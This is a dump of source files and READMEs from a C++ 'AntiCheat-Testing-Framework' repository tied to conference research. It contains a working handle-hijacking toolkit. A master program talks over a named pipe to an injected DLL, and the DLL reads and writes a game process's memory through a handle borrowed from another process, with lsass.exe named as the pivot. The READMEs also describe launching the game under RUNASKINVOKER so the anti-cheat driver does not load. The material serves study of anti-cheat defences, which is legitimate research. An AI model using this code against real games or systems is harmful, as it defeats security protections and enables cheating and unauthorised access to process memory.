MaxSpeed 140 | true 141 | true 142 | true 143 | _CRT_SECURE_NO_WARNINGS;NDEBUG;HANDLEHIJACKINGDLL_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 144 | true 145 | $(SolutionDir)CheatHelper;%(AdditionalIncludeDirectories) 146 | 147 | 148 | Windows 149 | true 150 | true 151 | true 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | 160 | 161 | Create 162 | Create 163 | Create 164 | Create 165 | 166 | 167 | 168 | 169 | {a080c117-d1db-4671-8217-65496573ba4d} 170 | 171 | 172 | 173 | 174 | 175 | 176 | 177 | 178 | -------------------------------------------------------------------------------- /HandleHijackingDLL/HandleHijackingDLL.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | 
h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | Header Files 23 | 24 | 25 | 26 | 27 | Source Files 28 | 29 | 30 | Source Files 31 | 32 | 33 | 34 | 35 | 36 | -------------------------------------------------------------------------------- /HandleHijackingDLL/README.md: -------------------------------------------------------------------------------- 1 | # HandleHijacking DLL 2 | 3 | ## Introduction 4 | 5 | 6 | ## Usage 7 | 8 | This module is used combinaded with **HandleHijackingMaster**. This is the DLL implementation that has to be injected into a process that already has a handle to the game. 9 | 10 | HandleHijakingMaster will create a NamedPipe that this module uses to receive instructions and then return information to the master (where all the bot logic should be located). 11 | 12 | 13 | ## Combination with other techniques 14 | 15 | - **RUNASKINVOKER**: By executing the game using this options we will prevent the Anti-cheat to fully protect the game end load the driver. 
16 | 17 | 18 | -------------------------------------------------------------------------------- /HandleHijackingDLL/stdafx.cpp: -------------------------------------------------------------------------------- 1 | #include "stdafx.h" 2 | -------------------------------------------------------------------------------- /HandleHijackingDLL/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers 11 | // Windows Header Files 12 | #include 13 | 14 | 15 | 16 | // reference additional headers your program requires here 17 | -------------------------------------------------------------------------------- /HandleHijackingDLL/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /HandleHijackingMaster/HandleHijackingMaster.cpp: -------------------------------------------------------------------------------- 1 | // HandleHijackingMaster.cpp : This file contains the 'main' function. Program execution begins and ends there. 
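//

#include "pch.h"
#include "CheatHelper.h"
#include <iostream> // header name was lost in this listing; <iostream> assumed from the std::cout use below

// Controller ("master") side of the handle-hijacking test described in this
// module's README: it creates a named pipe, waits for the injected DLL to
// connect, then sends one request per action code and prints each response.
// The artifacts this side produces, and that a monitoring product can key on,
// are the named pipe (name taken from config) and an
// OpenProcess(PROCESS_ALL_ACCESS) attempt against the configured target process.

HANDLE hPipeServer;   // server end of the named pipe; NULL until StartPipe() succeeds
HANDLE hProcessOP;    // result of the direct OpenProcess attempt made in main()
HANDLE hProcessNtOP;  // not referenced anywhere else in this file
HANDLE hHeap = GetProcessHeap();
void* message = HeapAlloc(hHeap, 0, BUFSIZE); // allocated at load time; never used or freed in this file

typedef struct _CLIENT_ID
{
    HANDLE UniqueProcess;
    HANDLE UniqueThread;
} CLIENT_ID, *PCLIENT_ID;

typedef struct _UNICODE_STRING
{
    USHORT Length;
    USHORT MaximumLength;
    PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

typedef struct _OBJECT_ATTRIBUTES {
    ULONG Length;
    HANDLE RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;
    PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;

// Function-pointer type for NtOpenProcess. The pointer below is never resolved
// or called in this file.
typedef NTSTATUS(NTAPI* TNtOpenProcess)(PHANDLE ProcessHandle, ACCESS_MASK AccessMask, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientID);
TNtOpenProcess NtOpenProcess = NULL;

// Closes the pipe and process handles owned by this file, if they are open.
static void CloseHandles()
{
    if (hPipeServer != NULL && hPipeServer != INVALID_HANDLE_VALUE)
    {
        CloseHandle(hPipeServer);
        hPipeServer = NULL;
    }
    if (hProcessOP != NULL)
    {
        CloseHandle(hProcessOP);
        hProcessOP = NULL;
    }
}

// Creates the named pipe and blocks until one client has connected.
//
// Returns 1 once a client is connected, 0 if the pipe could not be created or
// the connect failed.
int StartPipe()
{
    //std::string namedPipeName = "\\\\.\\pipe\\driverbypass";
    //LPCSTR namedPipe = namedPipeName.c_str();

    // The type/read-mode flags belong in the pipe-mode argument, not the
    // open-mode one. Both byte-mode flags are zero, so the call is equivalent
    // to the original. NULL security attributes means the pipe gets the
    // default security descriptor.
    hPipeServer = CreateNamedPipe(CheatHelper::namedPipeName,
        PIPE_ACCESS_DUPLEX,
        PIPE_TYPE_BYTE | PIPE_READMODE_BYTE | PIPE_WAIT,
        PIPE_UNLIMITED_INSTANCES, BUFSIZE, BUFSIZE, 0, NULL);

    // CreateNamedPipe reports failure with INVALID_HANDLE_VALUE, not NULL, so
    // the original "!= NULL" test could never see a failure.
    if (hPipeServer == INVALID_HANDLE_VALUE)
    {
        std::cout << "[-] Couldn't create: " << std::dec << GetLastError() << std::endl;
        hPipeServer = NULL;
        return 0;
    }
    std::cout << "[+] NamedPipe created: " << CheatHelper::namedPipeName << std::endl;

    // A client that connects between CreateNamedPipe and ConnectNamedPipe makes
    // the call return FALSE with ERROR_PIPE_CONNECTED. That is a live
    // connection, not an error; the original loop retried on it forever.
    if (ConnectNamedPipe(hPipeServer, NULL) == FALSE && GetLastError() != ERROR_PIPE_CONNECTED)
    {
        std::cout << "[-] Couldn't connect: " << std::dec << GetLastError() << std::endl;
        CloseHandle(hPipeServer);
        hPipeServer = NULL;
        return 0;
    }

    std::cout << "[+] New connection received" << std::endl;
    return 1;
}

PipeMessageRequest PMRequest;   // request most recently prepared/sent by this side
PipeMessageResponse PMResponse; // response most recently received from the client

// Reads one PipeMessageResponse from the pipe into PMResponse and prints it.
//
// Returns 1 if ReadFile succeeded, 0 otherwise. The returned buffer is printed
// only for the read actions (1, 4, 6) and only when status is 0.
int ReadPipe() {
    DWORD dwRead;
    BOOL bRead;
    std::cout << "[+] Waiting for message. " << std::endl;

    bRead = ReadFile(hPipeServer, &PMResponse, sizeof(PipeMessageResponse), &dwRead, NULL);

    if (!bRead)
    {
        std::cout << "[-] Failed reading Pipe: " << std::dec << GetLastError() << std::endl;
        return 0;
    }

    // NOTE(review): dwRead is not compared with sizeof(PipeMessageResponse), so
    // a short read leaves stale fields in PMResponse. bytesRead is also taken
    // from the peer and passed to PrintBytes without being bounded by the size
    // of PMResponse.buffer (declared in CheatHelper.h, not shown here).
    if (PMResponse.status == 0)
    {
        std::cout << "\t[+] Status: Successful" << std::endl;
        if (PMRequest.action == 1 || PMRequest.action == 4 || PMRequest.action == 6)
        {
            std::cout << "\t[+] bytesRead: " << PMResponse.bytesRead << std::endl;
            std::cout << "\t[+] buffer: ";
            CheatHelper::PrintBytes((PVOID)PMResponse.buffer, PMResponse.bytesRead);
        }
    }
    else
    {
        std::cout << "\t[-] Status: Unsuccessful" << std::endl;
    }

    return 1;
}

// Prints the current PMRequest and writes it to the pipe as one raw struct.
//
// Returns 1 if WriteFile succeeded, 0 otherwise.
int WritePipe()
{
    BOOL bWrite;
    DWORD dwWritten;

    std::cout << "[+] Sending Msg: " << std::endl;
    std::cout << "\t[+] action: " << PMRequest.action << std::endl;
    std::cout << "\t[+] handle: 0x" << PMRequest.handle << std::endl;
    // std::hex is sticky: later integer output on std::cout stays hexadecimal
    // until a std::dec is written.
    std::cout << "\t[+] address: 0x" << std::hex << PMRequest.address << std::endl;
    std::cout << "\t[+] size: " << PMRequest.size << std::endl;
    std::cout << "\t[+] buffer: ";
    CheatHelper::PrintBytes((PVOID)PMRequest.buffer, PMRequest.size);

    bWrite = WriteFile(hPipeServer, &PMRequest, sizeof(PipeMessageRequest), &dwWritten, NULL);
    if (!bWrite)
    {
        std::cout << "[-] Failed writing: " << std::dec << GetLastError() << std::endl;
        return 0;
    }

    std::cout << "[+] Success writing." << std::endl;
    return 1;
}


// Runs each read/write primitive directly against `handle` from this process,
// without going through the pipe. The only call site in this file is commented
// out in main().
//
// prepareRequest is defined in CheatHelper (not shown); presumably it fills
// address/size/buffer from config for the selected action -- confirm there.
void handleTests(HANDLE handle)
{
    PMRequest.action = 1;
    CheatHelper::prepareRequest(PMRequest);
    CheatHelper::RPM((HANDLE)handle, (LPCVOID)PMRequest.address, PMResponse.buffer, PMRequest.size, NULL);

    PMRequest.action = 2;
    CheatHelper::prepareRequest(PMRequest);
    CheatHelper::WPM((HANDLE)handle, (LPVOID)PMRequest.address, PMRequest.buffer, PMRequest.size, NULL);

    PMRequest.action = 4;
    CheatHelper::prepareRequest(PMRequest);
    CheatHelper::NtRVM((HANDLE)handle, (LPVOID)PMRequest.address, PMResponse.buffer, PMRequest.size, NULL);

    PMRequest.action = 5;
    CheatHelper::prepareRequest(PMRequest);
    CheatHelper::NtWVM((HANDLE)handle, (LPVOID)PMRequest.address, PMRequest.buffer, PMRequest.size, NULL);

    // NOTE(review): unlike the RPM and NtRVM reads above, this read lands in
    // PMRequest.buffer rather than PMResponse.buffer. Left as in the original;
    // confirm whether that is intended.
    PMRequest.action = 6;
    CheatHelper::prepareRequest(PMRequest);
    CheatHelper::ZwRVM((HANDLE)handle, (LPVOID)PMRequest.address, PMRequest.buffer, PMRequest.size, NULL);

    PMRequest.action = 7;
    CheatHelper::prepareRequest(PMRequest);
    CheatHelper::ZwWVM((HANDLE)handle, (LPVOID)PMRequest.address, PMRequest.buffer, PMRequest.size, NULL);
}


// Entry point: loads config, waits for the target process, records whether a
// direct OpenProcess succeeds, then drives actions 1..7 over the pipe.
//
// Always returns 0.
int main()
{
    CheatHelper::loadConfig();

    // Setting up first action RPM
    //PMRequest.action = 1;
    PMRequest.handle = CheatHelper::requestHandleNP;
    PMRequest.address = 0x0;
    SecureZeroMemory(PMRequest.buffer, BUFSIZE);
    PMRequest.size = 0x0;

    // Polls without a delay until the target process exists.
    DWORD processID = 0;
    while (true)
    {
        processID = CheatHelper::GetProcId(CheatHelper::targetProc);
        if (processID != 0)
        {
            std::cout << "[+] PID: 0x" << std::hex << processID << std::endl;
            break;
        }
    }

    // Baseline measurement: the result is only printed, and the pipe exchange
    // below runs whether or not this direct open succeeds.
    hProcessOP = OpenProcess(PROCESS_ALL_ACCESS, false, processID);
    if (!hProcessOP) {
        std::cout << "[-] OpenProcess: Unable to obtain handle " << std::dec << GetLastError() << std::endl;
    }
    else
    {
        std::cout << "[+] OpenProcess: 0x" << std::hex << hProcessOP << std::endl;
        //handleTests(hProcessOP);
    }

    if (!StartPipe())
    {
        CloseHandles();
        return 0;
    }

    if (!ReadPipe())
    {
        std::cout << "[-] Failed reading Pipe." << std::endl;
    }

    // The client sends status 1 in its first message. Status 0 here therefore
    // means no hello was received (PMResponse is a zero-initialised global).
    if (PMResponse.status == 0)
    {
        CloseHandles();
        return 0;
    }
    std::cout << "[+] Cheat ready." << std::endl;

    // Clean PMRequest.address
    PMRequest.address = 0x0;

    // One request/response round trip per action code, 1 through 7.
    for (int i = 1; i <= 7; i++)
    {
        PMRequest.action = i;

        // We need to set the config values somehow, this is quickest way I found
        CheatHelper::prepareRequest(PMRequest);

        if (!WritePipe())
        {
            std::cout << "[-] Failed writing Pipe." << std::endl;
        }

        if (!ReadPipe())
        {
            std::cout << "[-] Failed reading Pipe." << std::endl;
        }
    }

    std::cout << "End!\n";

    // The original left both handles open until process exit.
    CloseHandles();
    return 0;
}

// Run program: Ctrl + F5 or Debug > Start Without Debugging menu
// Debug program: F5 or Debug > Start Debugging menu

// Tips for Getting Started:
// 1. Use the Solution Explorer window to add/manage files
// 2. Use the Team Explorer window to connect to source control
// 3. Use the Output window to see build output and other messages
// 4. Use the Error List window to view errors
// 5. Go to Project > Add New Item to create new code files, or Project > Add Existing Item to add existing code files to the project
// 6.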
In the future, to open this project again, go to File > Open > Project and select the .sln file 258 | -------------------------------------------------------------------------------- /HandleHijackingMaster/HandleHijackingMaster.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 15.0 23 | {8B5D48FC-71B6-40DA-9415-64CF55DC29FF} 24 | Win32Proj 25 | HandleHijackingMaster 26 | 10.0.17763.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v141 33 | MultiByte 34 | 35 | 36 | Application 37 | false 38 | v141 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v141 46 | MultiByte 47 | 48 | 49 | Application 50 | false 51 | v141 52 | true 53 | MultiByte 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | true 78 | 79 | 80 | false 81 | 82 | 83 | false 84 | 85 | 86 | 87 | NotUsing 88 | Level3 89 | Disabled 90 | true 91 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 92 | true 93 | pch.h 94 | $(SolutionDir)CheatHelper 95 | 96 | 97 | Console 98 | true 99 | 100 | 101 | 102 | 103 | NotUsing 104 | Level3 105 | Disabled 106 | true 107 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 108 | true 109 | pch.h 110 | $(SolutionDir)CheatHelper;%(AdditionalIncludeDirectories); 111 | 112 | 113 | Console 114 | true 115 | %(AdditionalDependencies) 116 | $(SolutionDir)x64\Debug;%(AdditionalLibraryDirectories);C:\Program Files (x86)\Microsoft Visual Studio\2017\Community\VC\Tools\MSVC\14.16.27023\lib\onecore\x64 117 | 118 | 119 | 120 | 121 | Use 122 | Level3 123 | MaxSpeed 124 | true 125 | true 126 | true 127 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 128 | true 129 | pch.h 130 | 131 | 132 | Console 133 | true 134 | true 135 | true 136 | 137 | 138 | 139 | 140 | NotUsing 141 | Level3 142 | MaxSpeed 143 | true 144 | true 145 
| true 146 | _CRT_SECURE_NO_WARNINGS;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 147 | true 148 | pch.h 149 | $(SolutionDir)CheatHelper;%(AdditionalIncludeDirectories) 150 | 151 | 152 | Console 153 | true 154 | true 155 | true 156 | 157 | 158 | 159 | 160 | 161 | 162 | 163 | 164 | Create 165 | Create 166 | Create 167 | Create 168 | 169 | 170 | 171 | 172 | {a080c117-d1db-4671-8217-65496573ba4d} 173 | 174 | 175 | 176 | 177 | 178 | 179 | 180 | 181 | -------------------------------------------------------------------------------- /HandleHijackingMaster/HandleHijackingMaster.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | 23 | 24 | Source Files 25 | 26 | 27 | Source Files 28 | 29 | 30 | 31 | 32 | 33 | -------------------------------------------------------------------------------- /HandleHijackingMaster/README.md: -------------------------------------------------------------------------------- 1 | # HandleHijackingMaster 2 | 3 | ## Introduction 4 | 5 | 6 | ## Usage 7 | 8 | This module is used combinaded with **HandleHijackingDLL**. This is the "command and control" implementation. Has to be executed before injecting the DLL. 9 | 10 | HandleHijakingMaster will create a NamedPipe that the DLL will use to receive instructions and then return information to the master (where all the bot logic should be located). 
11 | 12 | ## Configuration 13 | 14 | This module requires configuration: 15 | 16 | - ~~Address to Read/Write (TODO: implement to use multiple addresses, not just one)~~ 17 | - ~~Sequence of actions to perform (TODO: now it tries everything from 0 to 5, implement a list)~~ 18 | - ~~HANDLE to use as pivot (TODO: It is hardocded now so it need to be recompiled, it would be better to enumerate handles and identify the correct one).~~ 19 | - The following variables in config.ini need to the provided: 20 | 21 | [Addresses] 22 | ``` 23 | RPMAddressHigh=0x1 24 | RPMAddressLow=0x58A60000 25 | RPMAddress=0x0 26 | WPMAddressHigh=0x00000000 27 | WPMAddressLow=0x58A60000 28 | WPMAddress=0x0 29 | ntRVMAddressHigh=0x00000000 30 | ntRVMAddressLow=0x58A60000 31 | ntRVMAddress=0x0 32 | ntWVMAddressHigh=0x00000000 33 | ntWVMAddressLow=0x58A60000 34 | ntWVMAddress=0x0 35 | ZwRVMAddressHigh=0x00000000 36 | ZwRVMAddressLow=0x58A60000 37 | ZwRVMAddress=0x0 38 | ZwWVMAddressHigh=0x00000000 39 | ZwWVMAddressLow=0x58A60000 40 | ZwWVMAddress=0x0 41 | ``` 42 | 43 | [Handles] 44 | 45 | ``` 46 | requestHandleNP=0x15FC 47 | ``` 48 | 49 | [Buffers] 50 | ``` 51 | #SIZE MUST BE SIZE+1 52 | RPMBuffer=TTTT1 53 | RPMBufferSize=0x6 54 | WPMBuffer=TTTT2 55 | WPMBufferSize=0x6 56 | ntRVMBuffer=TTTT4 57 | ntRVMBufferSize=0x6 58 | ntWVMBuffer=TTTT5 59 | ntWVMBufferSize=0x6 60 | ZwRVMBuffer=TTTT6 61 | ZwRVMBufferSize=0x6 62 | ZwWVMBuffer=TTTT7 63 | ZwWVMBufferSize=0x6 64 | ``` 65 | 66 | [Strings] 67 | ``` 68 | targetProc=BlackDesert64.exe 69 | privotProc=lsass.exe 70 | #Edit in DLL if you changed it here 71 | namedPipeName=\\.\\pipe\\driverbypass 72 | ``` 73 | 74 | ## Combination with other techniques 75 | 76 | - **RUNASKINVOKER**: By executing the game using this options we will prevent the Anti-cheat to fully protect the game end load the driver. 
77 | 78 | 79 | -------------------------------------------------------------------------------- /HandleHijackingMaster/pch.cpp: -------------------------------------------------------------------------------- 1 | // pch.cpp: source file corresponding to pre-compiled header; necessary for compilation to succeed 2 | 3 | #include "pch.h" 4 | 5 | // In general, ignore this file, but keep it around if you are using pre-compiled headers. 6 | -------------------------------------------------------------------------------- /HandleHijackingMaster/pch.h: -------------------------------------------------------------------------------- 1 | // Tips for Getting Started: 2 | // 1. Use the Solution Explorer window to add/manage files 3 | // 2. Use the Team Explorer window to connect to source control 4 | // 3. Use the Output window to see build output and other messages 5 | // 4. Use the Error List window to view errors 6 | // 5. Go to Project > Add New Item to create new code files, or Project > Add Existing Item to add existing code files to the project 7 | // 6. In the future, to open this project again, go to File > Open > Project and select the .sln file 8 | 9 | #ifndef PCH_H 10 | #define PCH_H 11 | 12 | // TODO: add headers that you want to pre-compile here 13 | 14 | #endif //PCH_H 15 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # AntiCheat-Testing-Framework 2 | Framework to test any Anti-Cheat on the market. This can be used as Template or Code Base to test any Anti-Cheat and learn along the way. The entry level to reverse AntiCheats and Cheats is quite high, therefore, I'm realeasing all the code I developed during my research. The main idea is to help people and motive them to get into this topic which is really interesting and there is a lot to research about it. 
3 | 4 | All this code is the result of research done for Recon2019 (Montreal) and BlackHat Europe 2019 (London). 5 | 6 | Twitter: [@Niemand_sec](https://twitter.com/niemand_sec) 7 | 8 | More info: [Personal Blog](https://niemand.com.ar/) 9 | 10 | - **Description for each module can be found in each folder**. 11 | - Modules can be used together or separately. 12 | - Customization should be simple due to the modularity of the code. 13 | 14 | # Usage 15 | 16 | Most of the settings can be done using the config.ini file; however, some modules may require particular settings in the code, depending on your intentions. 17 | 18 | > Remember to change the location of the config.ini file at CheatHelper/CheatHelper.cpp (variable configFile) 19 | 20 | # Modules (more coming in the future) 21 | 22 | - CheatHelper 23 | - DriverDisabler 24 | - DriverHelper 25 | - ExternalCheatDriver 26 | - DriverTester 27 | - HandleElevationDriver 28 | - HandleHijackingDLL 29 | - HandleHijackingMaster 30 | - LuaHook 31 | - StealthHijackingNormalDLL 32 | - StealthHijackingNormalMaster 33 | 34 | # About this Project 35 | 36 | All this code is a result of the research presented at Recon 2019 and BlackHat Europe 2019: "Unveiling the underground world of Anti-Cheats" 37 | 38 | Links: 39 | - First Release Info: 40 | - https://recon.cx/2019/montreal/ 41 | - https://cfp.recon.cx/reconmtl2019/talk/MRJ3CN/ 42 | - Second Release: 43 | - https://www.blackhat.com/eu-19/briefings/schedule/index.html#unveiling-the-underground-world-of-anti-cheats-17359 44 | 45 | 46 | -------------------------------------------------------------------------------- /StealthHijackingNormalDLL/Readme.md: -------------------------------------------------------------------------------- 1 | # StealthHandleHijacking DLL 2 | 3 | ## Introduction 4 | 5 | 6 | ## Usage 7 | 8 | This module is used combined with **StealthHandleHijackingMaster**.
This is the DLL implementation that has to be injected into a process that already has a handle to the game. 9 | 10 | HandleHijakingMaster will create a FileMapping (Share Memory) that this module uses to receive instructions and then return information to the master (where all the bot logic should be located). 11 | 12 | ## Combination with other techniques 13 | 14 | - **RUNASKINVOKER**: By executing the game using this options we will prevent the Anti-cheat to fully protect the game end load the driver. 15 | 16 | 17 | -------------------------------------------------------------------------------- /StealthHijackingNormalDLL/StealthHijackingNormalDLL.cpp: -------------------------------------------------------------------------------- 1 | // StealthHijackingNormalDLL.cpp : Defines the exported functions for the DLL application. 2 | // 3 | 4 | #include "stdafx.h" 5 | #include 6 | #include "CheatHelper.h" 7 | #include 8 | 9 | #pragma warning(disable:5040) 10 | 11 | #define LOCK 0 12 | 13 | // EDIT if you modified the original name 14 | TCHAR fileMapName[] = TEXT("Global\\StealthHijacking"); 15 | 16 | HANDLE hFileMap = NULL; 17 | LPVOID pFileMapMem = NULL; 18 | SIZE_T fileMapSize = FILEMAPSIZE; 19 | 20 | PipeMessageRequest PMRequest; 21 | PipeMessageResponse PMResponse; 22 | 23 | int ReadFileMapping() 24 | { 25 | 26 | CopyMemory(&PMRequest, (void*)(pFileMapMem), sizeof(PipeMessageRequest)); 27 | std::cout << "[+] Reading Msg: " << std::endl; 28 | std::cout << "\t[+] action: " << PMRequest.action << std::endl; 29 | std::cout << "\t[+] handle: 0x" << PMRequest.handle << std::endl; 30 | std::cout << "\t[+] address: 0x" << std::hex << PMRequest.address << std::endl; 31 | std::cout << "\t[+] size: " << PMRequest.size << std::endl; 32 | std::cout << "\t[+] buffer: "; 33 | CheatHelper::PrintBytes((PVOID)PMRequest.buffer, PMRequest.size); 34 | return 1; 35 | } 36 | 37 | 38 | int WriteFileMapping() 39 | { 40 | SecureZeroMemory(pFileMapMem, FILEMAPSIZE - 1); 41 | std::cout << 
"[+] Sending Msg: " << std::endl; 42 | std::cout << "\t[+] Status: " << PMResponse.status << std::endl; 43 | std::cout << "\t[+] bytesRead: " << PMResponse.bytesRead << std::endl; 44 | std::cout << "\t[+] buffer: "; 45 | CheatHelper::PrintBytes((PVOID)PMResponse.buffer, PMResponse.bytesRead); 46 | CopyMemory((void*)(pFileMapMem), &PMResponse, sizeof(PipeMessageResponse)); 47 | return true; 48 | } 49 | 50 | int handleAction() 51 | { 52 | switch (PMRequest.action) { 53 | case 0: //Ping 54 | { 55 | std::cout << '0' << std::endl; 56 | break; 57 | } 58 | case 1: //RPM 59 | { 60 | std::cout << '1' << std::endl; 61 | SIZE_T stRead = 0; 62 | 63 | int status = CheatHelper::RPM((HANDLE)PMRequest.handle, (LPCVOID)PMRequest.address, PMResponse.buffer, PMRequest.size, &PMResponse.bytesRead); 64 | 65 | if (status == 0)//SUCCESS 66 | { 67 | PMResponse.status = 0; 68 | return 0; 69 | } 70 | 71 | PMResponse.status = 1; 72 | return 1; 73 | } 74 | case 2: //WPM 75 | { 76 | std::cout << '2' << std::endl; 77 | SIZE_T stWrite = 0; 78 | 79 | int status = CheatHelper::WPM((HANDLE)PMRequest.handle, (LPVOID)PMRequest.address, PMRequest.buffer, PMRequest.size, &stWrite); 80 | 81 | if (status == 0) //SUCCESS 82 | { 83 | PMResponse.status = 0; 84 | return 0; 85 | } 86 | 87 | PMResponse.status = 1; 88 | return 1; 89 | } 90 | case 3: //CreatRemoteThread 91 | { 92 | std::cout << '3' << std::endl; 93 | break; 94 | } 95 | case 4: //NtReadVirtualMemory 96 | { 97 | std::cout << '4' << std::endl; 98 | 99 | auto status = CheatHelper::NtRVM((HANDLE)PMRequest.handle, (LPVOID)PMRequest.address, PMResponse.buffer, PMRequest.size, (PULONG)&PMResponse.bytesRead); 100 | 101 | if (status == 0) 102 | { 103 | PMResponse.status = 0; 104 | return 0; 105 | } 106 | 107 | PMResponse.status = 1; 108 | return 1; 109 | 110 | } 111 | case 5: //NtWriteVirtualMemory 112 | { 113 | std::cout << '5' << std::endl; 114 | SIZE_T stWrite = 0; 115 | 116 | int status = CheatHelper::NtWVM((HANDLE)PMRequest.handle, 
(LPVOID)PMRequest.address, PMRequest.buffer, PMRequest.size, (PULONG)&stWrite); 117 | if (status == 0) 118 | { 119 | PMResponse.status = 0; 120 | return 0; 121 | } 122 | 123 | PMResponse.status = 1; 124 | return 1; 125 | } 126 | case 6: //ZwReadVirtualMemory 127 | { 128 | std::cout << '6' << std::endl; 129 | 130 | auto status = CheatHelper::ZwRVM((HANDLE)PMRequest.handle, (LPVOID)PMRequest.address, PMResponse.buffer, PMRequest.size, (PULONG)&PMResponse.bytesRead); 131 | 132 | if (status == 0) 133 | { 134 | PMResponse.status = 0; 135 | return 0; 136 | } 137 | 138 | PMResponse.status = 1; 139 | return 1; 140 | 141 | } 142 | case 7: //ZwWriteVirtualMemory 143 | { 144 | std::cout << '7' << std::endl; 145 | SIZE_T stWrite = 0; 146 | 147 | int status = CheatHelper::ZwWVM((HANDLE)PMRequest.handle, (LPVOID)PMRequest.address, PMRequest.buffer, PMRequest.size, (PULONG)&stWrite); 148 | if (status == 0) 149 | { 150 | PMResponse.status = 0; 151 | return 0; 152 | } 153 | 154 | PMResponse.status = 1; 155 | return 1; 156 | } 157 | default: 158 | { 159 | std::cout << "Default" << std::endl; 160 | break; 161 | 162 | } 163 | } 164 | } 165 | 166 | int Init() 167 | { 168 | 169 | // UNCOMMENT IF: We need to delay the connection to the Master. 170 | //Sleep(300000); 171 | 172 | hFileMap = OpenFileMapping(FILE_MAP_ALL_ACCESS, 0, fileMapName); 173 | if (hFileMap == NULL) 174 | { 175 | std::cout << "[-] CreateFileMappingA failed: " << GetLastError() << std::endl; 176 | return false; 177 | } 178 | std::cout << "[+] CreateFileMappingA." << std::endl; 179 | pFileMapMem = MapViewOfFile(hFileMap, FILE_MAP_ALL_ACCESS, 0, 0, fileMapSize); 180 | if (!pFileMapMem) 181 | { 182 | std::cout << "[-] MapViewOfFile failed." << std::endl; 183 | return false; 184 | } 185 | std::cout << "[+] MapViewOfFile." 
<< std::endl; 186 | 187 | // Closing handle to go stealthier 188 | CloseHandle(hFileMap); 189 | 190 | CheatHelper::setSpinLockByte(pFileMapMem, !LOCK); 191 | 192 | } 193 | 194 | 195 | int main() { 196 | CheatHelper::ConsoleSetup("Client"); 197 | Init(); 198 | 199 | while (1) 200 | { 201 | CheatHelper::checkSpinLockByte(pFileMapMem, LOCK); 202 | 203 | if (!ReadFileMapping()) 204 | { 205 | std::cout << "[-] Failed reading." << std::endl; 206 | } 207 | 208 | int success = handleAction(); 209 | 210 | if (!WriteFileMapping()) 211 | { 212 | std::cout << "[-] Failed writing." << std::endl; 213 | } 214 | 215 | CheatHelper::setSpinLockByte(pFileMapMem, !LOCK); 216 | 217 | if (PMRequest.action == 7) 218 | { 219 | break; 220 | } 221 | } 222 | 223 | UnmapViewOfFile(pFileMapMem); 224 | 225 | } 226 | 227 | 228 | BOOL APIENTRY DllMain(HMODULE hModule, 229 | DWORD ul_reason_for_call, 230 | LPVOID lpReserved 231 | ) 232 | { 233 | switch (ul_reason_for_call) 234 | { 235 | case DLL_PROCESS_ATTACH: 236 | { 237 | DisableThreadLibraryCalls(hModule); 238 | CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE)main, NULL, NULL, NULL); 239 | } 240 | case DLL_THREAD_ATTACH: 241 | case DLL_THREAD_DETACH: 242 | case DLL_PROCESS_DETACH: 243 | break; 244 | } 245 | return TRUE; 246 | } 247 | 248 | 249 | 250 | -------------------------------------------------------------------------------- /StealthHijackingNormalDLL/StealthHijackingNormalDLL.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 